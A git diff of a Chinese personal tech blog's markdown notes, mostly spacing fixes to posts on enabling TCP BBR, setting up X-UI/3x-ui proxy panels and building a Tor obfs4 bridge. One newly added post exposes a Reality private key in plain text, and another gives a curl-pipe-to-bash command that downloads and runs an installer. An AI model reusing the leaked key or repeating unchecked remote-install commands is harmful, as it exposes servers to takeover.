mysql_arry=("blog" "study") # 数据库名称
date_time=$(date +"%Y_%m_%d")
-year=$(date +"%Y")
+year=$(date +"%Y")
user="" # 数据库用户名
password="" # 数据库密码
diff --git a/src/content/技术日志/linux/开启系统自带的TCP-BBR加速.md b/src/content/技术日志/linux/开启系统自带的TCP-BBR加速.md
index 7106f51..2a5118a 100644
--- a/src/content/技术日志/linux/开启系统自带的TCP-BBR加速.md
+++ b/src/content/技术日志/linux/开启系统自带的TCP-BBR加速.md
@@ -4,7 +4,7 @@ date: 2024-07-02T17:19:38+08:00
tags: []
---
-> **系统自带内核高于4.9 则默认已包含 BBR**
+> **系统自带内核高于 4.9 则默认已包含 BBR**
### 1. 检查内核版本
@@ -14,12 +14,12 @@ uname -r
> 内核版本高于 4.9 就行。
-### 2. 开启BBR
+### 2. 开启 BBR
-通过向 `/etc/sysctl.conf`文件添加配置来启用BBR
+通过向 `/etc/sysctl.conf`文件添加配置来启用 BBR
```bash
-echo "net.core.default_qdisc=fq" | sudo tee -a /etc/sysctl.conf
+echo "net.core.default_qdisc=fq" | sudo tee -a /etc/sysctl.conf
echo "net.ipv4.tcp_congestion_control=bbr" | sudo tee -a /etc/sysctl.conf
```
@@ -31,13 +31,13 @@ su root -c "sudo sysctl -p"
### 4. 生效检测
-**执行下面命令,如果结果中带有****[bbr](https://www.moeelf.com/tag/bbr "View all posts in bbr")** **,则证明你的内核已开启****[bbr](https://www.moeelf.com/tag/bbr "View all posts in bbr")** **。**
+**执行下面命令,如果结果中带有****[bbr](https://www.moeelf.com/tag/bbr "View all posts in bbr")** **,则证明你的内核已开启****[bbr](https://www.moeelf.com/tag/bbr "View all posts in bbr")** **。**
```bash
sysctl net.ipv4.tcp_available_congestion_control
```
-**注:也可以执行下面命令,如果结果中有****[bbr](https://www.moeelf.com/tag/bbr "View all posts in bbr")** **,也可以证明你的内核已开启****[bbr](https://www.moeelf.com/tag/bbr "View all posts in bbr")** **。**
+**注:也可以执行下面命令,如果结果中有****[bbr](https://www.moeelf.com/tag/bbr "View all posts in bbr")** **,也可以证明你的内核已开启****[bbr](https://www.moeelf.com/tag/bbr "View all posts in bbr")** **。**
```bash
lsmod | grep bbr
diff --git a/src/content/技术日志/vpn/3x-ui配置.md b/src/content/技术日志/vpn/3x-ui配置.md
new file mode 100644
index 0000000..f696af5
--- /dev/null
+++ b/src/content/技术日志/vpn/3x-ui配置.md
@@ -0,0 +1,33 @@
+---
+title: "3x-ui配置"
+date: 2025-04-19T10:48:48+08:00
+tags: []
+---
+
+3x-ui:[https://github.com/MHSanaei/3x-ui](https://github.com/MHSanaei/3x-ui)
+
+安全:`Reality`
+
+Dest (Target)
+
+```txt
+apple.com:443
+```
+
+SNI
+
+```txt
+apple.com
+```
+
+公钥
+
+```txt
+jCK3ORKMwzmJsig7gMWOTGlaF2wvuVAcEr7jbB1bnwU
+```
+
+私钥
+
+```txt
+oN60djdg_ZRUiChp0Rj-emZ3VhM_x8rL93H4rhdq1Wc
+```
diff --git a/src/content/技术日志/vpn/X-UI面板快速搭建和配置.md b/src/content/技术日志/vpn/X-UI面板快速搭建和配置.md
index 6281bcf..6e69ee8 100644
--- a/src/content/技术日志/vpn/X-UI面板快速搭建和配置.md
+++ b/src/content/技术日志/vpn/X-UI面板快速搭建和配置.md
@@ -6,19 +6,19 @@ tags: ["x-ui"]
## 一、部署安装
-GitHub项目地址:[https://github.com/FranzKafkaYu/x-ui](https://github.com/FranzKafkaYu/x-ui)
+GitHub 项目地址:[https://github.com/FranzKafkaYu/x-ui](https://github.com/FranzKafkaYu/x-ui)
1. 复制粘贴以下代码,并运行:
- ```bash
- bash <(curl -Ls https://raw.githubusercontent.com/FranzKafkaYu/x-ui/master/install.sh)
- ```
+ ```bash
+ bash <(curl -Ls https://raw.githubusercontent.com/FranzKafkaYu/x-ui/master/install.sh)
+ ```
- 注意:在IPv6 Only的VPS中(例如:Euserv、Hax),请先安装warp,否则无法访问Github API而报错。
+ 注意:在 IPv6 Only 的 VPS 中(例如:Euserv、Hax),请先安装 warp,否则无法访问 Github API 而报错。
2. 设置用户名密码、面板访问端口。
- 待出现X-ui的菜单时,就已经成功一半了!
+ 待出现 X-ui 的菜单时,就已经成功一半了!
## 二、配置
@@ -31,7 +31,7 @@ GitHub项目地址:[https://github.com/FranzKafkaYu/x-ui](https://github.com/F
- 端口:`443`
- reality:`开启`
- 添加用户:+
- - flow选择xtls-rprx-vision
+ - flow 选择 xtls-rprx-vision
- 其他默认
## 三、使用
diff --git a/src/content/技术日志/vpn/centos7.x搭建Tor私人网桥.md b/src/content/技术日志/vpn/centos7.x搭建Tor私人网桥.md
index c3c2980..a22d01b 100644
--- a/src/content/技术日志/vpn/centos7.x搭建Tor私人网桥.md
+++ b/src/content/技术日志/vpn/centos7.x搭建Tor私人网桥.md
@@ -12,7 +12,7 @@ yum install tor -y
## 2. 安装 obfs4
-### 通过python进行编译安装
+### 通过 python 进行编译安装
#### 安装所需依赖软件模块
@@ -26,21 +26,21 @@ yum install make automake gcc python-pip python-devel libyaml-devel
pip install obfsproxy
```
-### 通过go进行编译安装
+### 通过 go 进行编译安装
-#### 下载go的obfs4项目
+#### 下载 go 的 obfs4 项目
```bash
git clone http://www.github.com/Yawning/obfs4
```
-#### 进入obfs4目录进行编译
+#### 进入 obfs4 目录进行编译
```bash
go build -o obfs4proxy/obfs4proxy ./obfs4proxy
```
-#### 复制bofs4proxy到系统工作目录下
+#### 复制 bofs4proxy 到系统工作目录下
```bash
cp ./obfs4proxy/obfs4proxy /usr/bin/obfs4proxy
@@ -67,13 +67,13 @@ ExtORPort auto
PublishServerDescriptor 0
```
-### 重启tor服务
+### 重启 tor 服务
```bash
systemctl restart tor
```
-### 查看tor服务状态
+### 查看 tor 服务状态
```bash
systemctl status tor
@@ -128,7 +128,7 @@ iatmode=0
vim /etc/firewalld/zones/public.xml
```
-内容如下(本例ORPort端口 => 6666, obfs4端口 => 46396):
+内容如下(本例 ORPort 端口 => 6666, obfs4 端口 => 46396):
```xml
您访问的页面不存在或已被移动到其他位置
我的旅行足迹